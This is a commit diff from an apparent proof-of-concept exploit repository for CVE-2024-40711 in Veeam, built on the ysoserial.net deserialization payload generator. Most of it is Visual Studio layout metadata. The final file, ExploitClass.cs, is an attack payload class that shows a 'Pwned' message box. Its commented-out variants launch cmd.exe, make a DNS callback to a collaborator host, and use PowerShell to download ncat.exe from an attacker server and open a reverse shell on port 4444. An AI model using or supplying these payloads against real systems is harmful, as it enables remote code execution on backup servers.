upload file

CVE-2024-40711-poc/.vs/ysoserial/v17/DocumentLayout.backup.json

@@ -0,0 +1,123 @@
+{
+  "Version": 1,
+  "WorkspaceRootPath": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\",
+  "Documents": [
+    {
+      "AbsoluteMoniker": "D:0:0:{00000000-0000-0000-0000-000000000000}|\u003CSolution\u003E|ysoserial||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\generators\\veeamgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\veeamgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\generators\\activitysurrogateselectorfromfilegenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\activitysurrogateselectorfromfilegenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\helpers\\inputargs.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\helpers\\inputargs.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\generators\\genericprincipalgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\genericprincipalgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\||{B270807C-D8C6-49EB-8EBE-8E8D566637A1}|6185191f-1008-4fb2-a715-3a4e4f27e610"
+    }
+  ],
+  "DocumentGroupContainers": [
+    {
+      "Orientation": 0,
+      "VerticalTabListWidth": 256,
+      "DocumentGroups": [
+        {
+          "DockedWidth": 200,
+          "SelectedChildIndex": 0,
+          "Children": [
+            {
+              "$type": "Document",
+              "DocumentIndex": 0,
+              "Title": "ysoserial",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\ysoserial.csproj",
+              "RelativeDocumentMoniker": "ysoserial\\ysoserial.csproj",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\ysoserial.csproj",
+              "RelativeToolTip": "ysoserial\\ysoserial.csproj",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.001001|",
+              "WhenOpened": "2024-10-16T02:48:08.71Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 4,
+              "Title": "InputArgs.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Helpers\\InputArgs.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Helpers\\InputArgs.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Helpers\\InputArgs.cs",
+              "RelativeToolTip": "ysoserial\\Helpers\\InputArgs.cs",
+              "ViewState": "AgIAABMAAAAAAAAAAAAgwB8AAAAcAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-16T02:32:49.766Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 5,
+              "Title": "GenericPrincipalGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "ViewState": "AgIAABoAAAAAAAAAAAA3wBkAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-15T01:18:09.887Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 3,
+              "Title": "ActivitySurrogateSelectorFromFileGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "ViewState": "AgIAABUAAAAAAAAAAAAYwCQAAAAHAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-16T02:42:01.235Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 1,
+              "Title": "VeeamGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\VeeamGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\VeeamGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\VeeamGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\VeeamGenerator.cs",
+              "ViewState": "AgIAAEkAAAAAAAAAAAD4v1AAAABnAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-15T01:13:58.102Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 2,
+              "Title": "Program.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Program.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Program.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Program.cs",
+              "RelativeToolTip": "ysoserial\\Program.cs",
+              "ViewState": "AgIAAC4AAAAAAAAAAAAjwDkAAABPAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-14T09:40:44.427Z",
+              "EditorCaption": ""
+            }
+          ]
+        }
+      ]
+    }
+  ]
+}

CVE-2024-40711-poc/.vs/ysoserial/v17/DocumentLayout.json

@@ -0,0 +1,123 @@
+{
+  "Version": 1,
+  "WorkspaceRootPath": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\",
+  "Documents": [
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\program.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\generators\\veeamgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\veeamgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\generators\\activitysurrogateselectorfromfilegenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\activitysurrogateselectorfromfilegenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{00000000-0000-0000-0000-000000000000}|\u003CSolution\u003E|ysoserial||{04B8AB82-A572-4FEF-95CE-5222444B6B64}|"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\helpers\\inputargs.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\helpers\\inputargs.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\generators\\genericprincipalgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}",
+      "RelativeMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|solutionrelative:ysoserial\\generators\\genericprincipalgenerator.cs||{A6C744A8-0E4A-4FC6-886A-064283054674}"
+    },
+    {
+      "AbsoluteMoniker": "D:0:0:{6B40FDE7-14EA-4F57-8B7B-CC2EB4A25E6C}|ysoserial\\ysoserial.csproj|c:\\users\\administrator\\desktop\\cve-2024-40711\\cve-2024-40711-poc\\ysoserial\\||{B270807C-D8C6-49EB-8EBE-8E8D566637A1}|6185191f-1008-4fb2-a715-3a4e4f27e610"
+    }
+  ],
+  "DocumentGroupContainers": [
+    {
+      "Orientation": 0,
+      "VerticalTabListWidth": 256,
+      "DocumentGroups": [
+        {
+          "DockedWidth": 200,
+          "SelectedChildIndex": 5,
+          "Children": [
+            {
+              "$type": "Document",
+              "DocumentIndex": 3,
+              "Title": "ysoserial",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\ysoserial.csproj",
+              "RelativeDocumentMoniker": "ysoserial\\ysoserial.csproj",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\ysoserial.csproj",
+              "RelativeToolTip": "ysoserial\\ysoserial.csproj",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.001001|",
+              "WhenOpened": "2024-10-16T02:48:08.71Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 4,
+              "Title": "InputArgs.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Helpers\\InputArgs.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Helpers\\InputArgs.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Helpers\\InputArgs.cs",
+              "RelativeToolTip": "ysoserial\\Helpers\\InputArgs.cs",
+              "ViewState": "AgIAABMAAAAAAAAAAAAgwB8AAAAcAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-16T02:32:49.766Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 5,
+              "Title": "GenericPrincipalGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\GenericPrincipalGenerator.cs",
+              "ViewState": "AgIAABoAAAAAAAAAAAA3wBkAAAAAAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-15T01:18:09.887Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 2,
+              "Title": "ActivitySurrogateSelectorFromFileGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\ActivitySurrogateSelectorFromFileGenerator.cs",
+              "ViewState": "AgIAABUAAAAAAAAAAAAYwCQAAAAHAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-16T02:42:01.235Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 1,
+              "Title": "VeeamGenerator.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\VeeamGenerator.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Generators\\VeeamGenerator.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Generators\\VeeamGenerator.cs",
+              "RelativeToolTip": "ysoserial\\Generators\\VeeamGenerator.cs",
+              "ViewState": "AgIAAEkAAAAAAAAAAAD4v1AAAABnAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-15T01:13:58.102Z",
+              "EditorCaption": ""
+            },
+            {
+              "$type": "Document",
+              "DocumentIndex": 0,
+              "Title": "Program.cs",
+              "DocumentMoniker": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Program.cs",
+              "RelativeDocumentMoniker": "ysoserial\\Program.cs",
+              "ToolTip": "C:\\Users\\Administrator\\Desktop\\CVE-2024-40711\\CVE-2024-40711-poc\\ysoserial\\Program.cs",
+              "RelativeToolTip": "ysoserial\\Program.cs",
+              "ViewState": "AgIAACsAAAAAAAAAAAAjwD8AAABwAAAAAAAAAA==",
+              "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000738|",
+              "WhenOpened": "2024-10-14T09:40:44.427Z",
+              "EditorCaption": ""
+            }
+          ]
+        }
+      ]
+    }
+  ]
+}

CVE-2024-40711-poc/ExploitClass/ExploitClass.cs

@@ -0,0 +1,47 @@
+// ExploitClass was renamed to E to reduce the size a little bit
+class E
+{
+    public E()
+    {
+        //try
+        //{
+        /* Payload code to be executed. Examples: */
+
+
+        /* Showing a message box: -c "ExploitClass.cs;System.Windows.Forms.dll" */
+        System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
+
+
+        /* Creating a text file: -c "ExploitClass.cs;System.dll"  */
+        /*
+        using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
+        {
+            outputFile.WriteLine("testme");
+        }
+        //*/
+
+
+        /* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;System.dll" */
+        //System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");
+
+
+        /* Running a command: -c "ExploitClass.cs;System.dll"  */
+        //System.Diagnostics.Process.Start("cmd.exe", "/c calc");
+        //System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");
+
+
+        /* Causing a delay */
+        //System.Threading.Thread.Sleep(10000); // waits for 10 seconds
+
+        /*For web pentesting*/
+        /*
+        System.Web.HttpContext.Current.Response.AddHeader("X-YSOSERIAL-NET","HERE");
+        System.Web.HttpContext.Current.Response.Cookies.Add(new System.Web.HttpCookie("X-YSOSERIAL-NET", "HERE"));
+        System.Web.HttpContext.Current.Response.End();
+        */
+        //}
+        //catch (Exception)
+        //{
+        //}
+    }
+}